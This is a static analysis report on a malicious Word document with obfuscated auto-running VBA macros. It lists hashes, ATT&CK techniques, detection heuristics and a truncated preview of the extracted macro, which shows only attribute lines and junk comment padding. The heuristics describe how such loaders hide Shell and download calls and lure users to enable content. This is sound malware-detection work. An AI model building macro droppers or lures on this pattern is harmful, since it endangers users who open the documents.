Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0fab6ba2713b6d92…

MALICIOUS

Office (OLE)

238.0 KB Created: 2018-09-18 06:08:00 Authoring application: Microsoft Office Word First seen: 2019-03-10
MD5: 68a23bb184618ff6008c6f7886fa3c89 SHA-1: a05fddd9081990f8d265488e6461e86d444b26dc SHA-256: 0fab6ba2713b6d9279182f9830e6ccdb647021d1897e3bdcb0718e8ec7ccdb61
322 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1059 Command and Scripting Interpreter

The sample is a malicious Office document containing obfuscated VBA macros. The AutoOpen macro is designed to execute a payload, likely by leveraging the Shell() function as indicated by critical heuristic firings. The document body explicitly instructs the user to 'Enable Content', a common lure for macro-based malware.

Heuristics 9

  • ClamAV: Doc.Malware.Generic-6923090-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-6923090-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 169959 bytes
SHA-256: cb1643b973fd5c5086d758417eb74449435179044a06c32b04b9cc7e16b630e1
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
' TISTnF TTutu fh nn t IIbhnnh.TIe uIbcet .Fdc.nuineeudn cui dc t.TcE eS hfdn  e
' ue i I n uuIbnt nE SuubnIndunfIhn FnnEnnonnnT
' Ei. nuI .hnnn.uuodFbdttnId d FhE ocb  u tu n  ee
' EdhcfeennhuF.IunSdbcutfeinu.uS fb nou Enud S.e.f.cd I fnunbSe  .odTtEEu    f   tcFhe fF din fT.
' fuSniFnuo id  ifI h IEuEuTddESnnid.oF  ESieu hn ou utiEntho fEhin
' eno  uF. u utoou etbucncF bE. cI i.  ihteuFouS. c
' . ih i nn   Sft  f niu cFI t TdudnhEoEuucnhTnoI
' n nFun Fn nbhob tfcnIEe.nu SE F bES.nfndcb    tTFhhIuEooddn u ect ITennTt Te nf TnhIn.u.SincSEEF i
' ncnbuTenItnc onIhnfeiE benbTcduEodbET Sfuc   uS boTh
'   dnn  noniuh EfndFeoSbnfbouh E bSn uddt Ti f  dnhuo nh Snu  TufnE
' eSccnc  Sn uhEnnnc f  o  Tboc dcn
'  iII nce tib TbnIhun cF  bn.t n
' nFuFfu eI fSddTnbnui ntu n FnnE SSFTcFohSc Ei oFId nIudntnnno.   nnIn dSn ftbuni nb.oTunu
' n TTiud.no dSFufEF  c n     iuFTo n.nn
' t uneuEnencduf dotn ncu nnb  iouhSnnTnhunu b dI Itd  F uh hnfnfu nn tnThu  cfno.T
' nt dT. uFtud d.oninSSc fnthEbni  n
'  ucS   bFd du S.eiu cnthFobett tEc oTSSd nuI tu ndb eeuuFe.uE. ub tfc  b.n uIun i  F uEno ucEh
'    So  nen bf .TdeT.IitdbFSIIidSfnnu u   TceF n  bbbdnFi
' c  hnf  InS h hoF.  nnSnc  .uenuSbfFEedic nhEh
' .bdun nnSdh.tF boTFcuee E S I  nTu Fc  nIe  S
' ibdn fn t ioc.noi  ndEhin oetoiIFue ein en uiSTctho
'  c T S diInhFif uFfnT n  TchdEtInc
' cnn nnIonucnuF. ifInbn.IIIfI Ft chuun . ht i fn.ou ni
'   e   iIbt Tt n hcf .iue .effo  b  idituI cc Tn edE
'   nSS h  tb d Fnnt   cuFt SunFtu. IuninEdbnboT  hfo TESeIn uetnSEnEbuiFttuoebu c nc
' n  ocIcn ncbnnI.  TbnuE  iE FnF  fIni. ieTIh I cte cfFT dEtI d.
' oFnncd tncndi c  ei T nb ffnnIdn
' n udnn.eitbnfhT   .IoSeno.E dcn.h
' n E..IIbbnEn nn nhe.cuuunfnunSShc.Tnn tTStFS ncuSEe IbFu Iu efteEb TTnn
' .nu dSno bFn .E o. oEFnnEt E  n u. Fuffhn dhu b
' u  T.uu i Inu  .ih  EtuotiS bhcbuI  I E f uFcn n ienonFn TnuhuFf
' n TnnnunehhhonnFodn foben u hF  uhEbb.nbn n   TcEbnt.duu . nnno udnnItububnne
' fbd nebETbdbuuSin   nieI EbEFdFnnun ThS fehFccnTEbebInu.nd . Tbhn nF f oeotudnn fnudn
'  IuSSSeifc.c SFhnEnnSFb fII f.u iti Shc t iu htn tuunnte ST.hucb SE
' dTS fn  bnST hoiIfdii  I i.  cn cftdFdiE  nb
' t ueS nnunfiTSFouuh fbunnE FdSu dnnt.SFinuccf n ct. nTdthnu    bi... boF .Fnn
' n unuhnb  o unEcnfoh enhthF fu nntbid  bFi  ddunToi n u
'  cdtSnnuTFn.cndnnn Tn iEfFdenunuEnInTn EtcIic ihutuun IunE   o STnI I  u
'  ii  nTT u   hEd Sih.tSn.nESnbT
' h.  h ehb f ubnu  ufu ccitnoi dtcbn.nnbEIE.TnIcbEnnnToubnItoInS nunnIE.
' nfbhiI.fnc unESfE Fbt.hSn I i echbE.Tdboe.nnf  teTun .ii.EciSncIt eodtuu hI
'  eiE n hcS dfIncnhT nFIcnS  n. oIn bTnT
' FtfnuIu nfuT.hnnhfo.donSn Fnnedbd.nddnd hiu FIniSbcdeF. E.n.EbeonSnbuo bbFn  b. i h.b nuTF
' iTn Eue Fo feu nd Tbhtnhfd n  hFn F.ftfoin f IeE bFn    uEhnT.fnfFo
' eIcninIIoEfdFbbhcoeS  ntuInuouuttcI no. bodFhe.ifeSnenn u.e unSniSSSn bSnbhdnhTtfuunTTdTinuIc uft.f
' nd fFSbIbeiTuS FnfenTEdFEdhn db no u nIEfSn.o n bnnuennnI ud n b F fnc icSb inS.
' en oIcneSFnoco.bEftEni e.u  Fbn.c eentc.fFFnn. i  enfiE nbfEcin di i ntuIFF F SI.FbnucnunhI
' S hTc.no enb huFTTT. nnFTdI.TodenooS fFIdt ee Fto fu FndttTE. .ShFiiSShhIbi    FifEdudfu fidot n
' nhnnSnuS uhthEu n    I e c dnf dhu.   i  EoT ooc  SIfIb nhu
' I. ntIucunnbotone  T TSionfducct
'  unEeefbS n u neiudEuTuc.E.u  undEbnTT.cFThnntd u fn u ttuoi
'   uet u oSnhI S.S  nehiS..nnIn
' Fun nucSthcInhnFn  SF.FcES hn   S Si.
' f tbtne cun notnuSfbSd iTouf e Fdn.E  .
' e ES uto.uiohdtotcudeT fEeEb bS nnTbuStcnI E SnSi o itnnu un fi nenS. bnc. nSn IF
' EdEIndt bhnTn  n.oFt f  noSuucnFncnu
' TShoST.Fuh e.fnu.nfhInEicuniTFTnT fo tunnn  FhutuS dFFnTnceuSdtehnfecnn hS duIndTcuuohn Ion  td ne
'      t i  ntn uoTi. SudETohnticucucfc bt oencniTI dtunudTSnhI oh Ffu IIInIboo fnu
' bn S
... (truncated)